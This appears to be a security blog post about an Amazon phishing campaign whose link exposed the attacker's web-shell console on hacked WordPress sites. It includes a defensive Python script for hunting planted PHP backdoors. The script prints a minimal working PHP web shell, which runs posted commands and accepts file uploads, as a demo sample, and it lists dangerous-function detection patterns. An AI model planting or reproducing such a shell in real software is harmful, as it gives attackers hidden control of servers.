Amazon Prime Phishbait: Lessons Learned

An Amazon phishing campaign is accidentally sending out links that lead straight to the attacker’s remote access console, according to Paul Ducklin at Naked Security. Ducklin explains that Sophos came across a generic Amazon Prime phishing email which informed recipients that their Amazon account had been suspended. The email contained a link for the user to verify their account by updating their card number and billing address.

The email wasn’t particularly convincing or well-written, but the Sophos researchers followed the link to see where it would take them. The link first redirected them through two legitimate WordPress sites, which had apparently been hacked by the attacker to use as stepping stones before the actual phishing site. This is a common tactic: the link in the email points at an established, reputable domain, so URL reputation checks in spam filters are less likely to block it.

After this, the attacker presumably intended to send the victim to a phishing page that would try to steal their Amazon credentials and financial details. However, the attacker seems to have made a disastrous mistake and instead used the URL to the console that controlled the hacked WordPress sites.

The attacker had planted a small, obscurely named PHP file (a web shell) on each compromised site that granted them direct access to the site’s files and allowed them to do things that even the WordPress administrator couldn’t do.

“In other words, the crooks have set things up so they can sidestep the WordPress administration console entirely,” Ducklin explains. “They don’t need a password; they won’t get logged by the WordPress system; and they can add and modify files that WordPress wouldn’t normally allow, essentially allowing them to hide content such as phishing pages and malware downloads in plain sight.”
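A site administrator’s first question after reading this is how to tell whether such a file is sitting in their own install. The following is an added example, not code from the Naked Security article or from Sophos: a small hunt script that walks a WordPress document root and flags PHP files that match the profile just described. The heuristics (request input reaching command or file functions, no reference to the WordPress bootstrap, a small file, PHP under `wp-content/uploads`), the directory layout it builds, and the planted sample file are all assumptions chosen to match the story, not an exhaustive detector.

```python
"""Hunt for planted "file manager" PHP backdoors in a WordPress tree.

Added example; not code from the Naked Security article. The layout it
builds and the heuristics it applies are assumptions, chosen to match the
small standalone PHP file the story describes, not an exhaustive detector.
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

# Calls a standalone backdoor needs to run commands, write files or unpack itself.
DANGEROUS_CALLS = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|exec|popen|proc_open|"
    r"file_put_contents|move_uploaded_file|unlink|base64_decode|gzinflate)\s*\(",
    re.IGNORECASE,
)
# Backdoors take their orders straight from the request, not from WordPress APIs.
REQUEST_INPUT = re.compile(r"\$_(GET|POST|REQUEST|COOKIE|FILES)\b")
# Legitimate plugin/theme code is loaded by WordPress and refers to its bootstrap.
WP_BOOTSTRAP = re.compile(r"wp-load\.php|ABSPATH|wp-blog-header\.php|add_action\s*\(")
# WordPress never writes PHP into uploads; a .php file there is almost always planted.
UPLOAD_DIR = "wp-content/uploads/"
MAX_BACKDOOR_BYTES = 8 * 1024


def score_php_file(path: Path, root: Path) -> list[str]:
    """Return the reasons a PHP file looks like a planted backdoor (empty = clean)."""
    reasons: list[str] = []
    rel = path.relative_to(root).as_posix()
    if rel.startswith(UPLOAD_DIR):
        reasons.append("PHP under upload-only directory")
    text = path.read_text(errors="replace")
    calls = sorted({m.group(1).lower() for m in DANGEROUS_CALLS.finditer(text)})
    if calls and REQUEST_INPUT.search(text):
        reasons.append("request input reaches " + ", ".join(calls))
        if not WP_BOOTSTRAP.search(text):
            reasons.append("runs standalone, bypassing WordPress (no wp-load/ABSPATH)")
        if len(text.encode()) <= MAX_BACKDOOR_BYTES:
            reasons.append(f"small script ({len(text.encode())} bytes)")
    return reasons


def scan_wordpress(root: Path) -> dict[str, list[str]]:
    """Walk the docroot and map each suspicious PHP file (relative path) to its reasons."""
    findings: dict[str, list[str]] = {}
    for path in sorted(root.rglob("*.php")):
        reasons = score_php_file(path, root)
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


# --- constructed demo site (not a real compromised host) -------------------
BENIGN_INDEX = "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"
BENIGN_PLUGIN = (
    "<?php\n/* Plugin Name: Hello */\n"
    "if (!defined('ABSPATH')) { exit; }\n"
    "add_action('admin_notices', function () { echo esc_html($_GET['msg'] ?? ''); });\n"
)
# Planted file (constructed): a minimal upload/exec backdoor of the kind the article describes.
PLANTED_SHELL = (
    "<?php\n"
    "if (isset($_FILES['f'])) { move_uploaded_file($_FILES['f']['tmp_name'], $_POST['p']); }\n"
    "if (isset($_POST['c'])) { echo shell_exec($_POST['c']); }\n"
)


def build_demo_site(root: Path) -> Path:
    """Lay out a tiny fake WordPress docroot with one planted shell (assumed paths)."""
    files = {
        "index.php": BENIGN_INDEX,
        "wp-content/plugins/hello/hello.php": BENIGN_PLUGIN,
        "wp-content/uploads/2020/09/.cache.php": PLANTED_SHELL,
    }
    for rel, body in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(body)
    return root


def run_demo() -> dict[str, list[str]]:
    """Build the demo site in a temp dir, scan it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_wordpress(build_demo_site(Path(tmp)))


if __name__ == "__main__":
    for rel, reasons in run_demo().items():
        print(rel)
        for r in reasons:
            print("   -", r)
```

Run it against a real install by calling `scan_wordpress(Path("/var/www/html"))` instead of `run_demo()`. Expect false positives from some plugins that legitimately write files from form input; the combination of "no WordPress bootstrap reference" and "PHP under uploads" is the part worth treating as a near-certain hit, and a file that trips both should be compared against a clean copy of the site before anything else.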

It’s not clear how the attacker compromised these sites in the first place, but Ducklin notes that outdated and vulnerable WordPress plugins are a frequent entry point. Ducklin says the story demonstrates the importance of good security practices for website administrators as well as for regular users. Even a minor website can have value to criminals as a staging area for future crimes.

“If your site gets hacked, you’ll probably end up blocklisted,” he writes. “Once the crooks start using your website to host malicious content, you are likely to end up getting blocked or filtered by security products and the major browsers.”

New-school security awareness training can create a culture of security within your organization by teaching all of your employees to follow security best practices.

Naked Security has the story:


Topics: Phishing
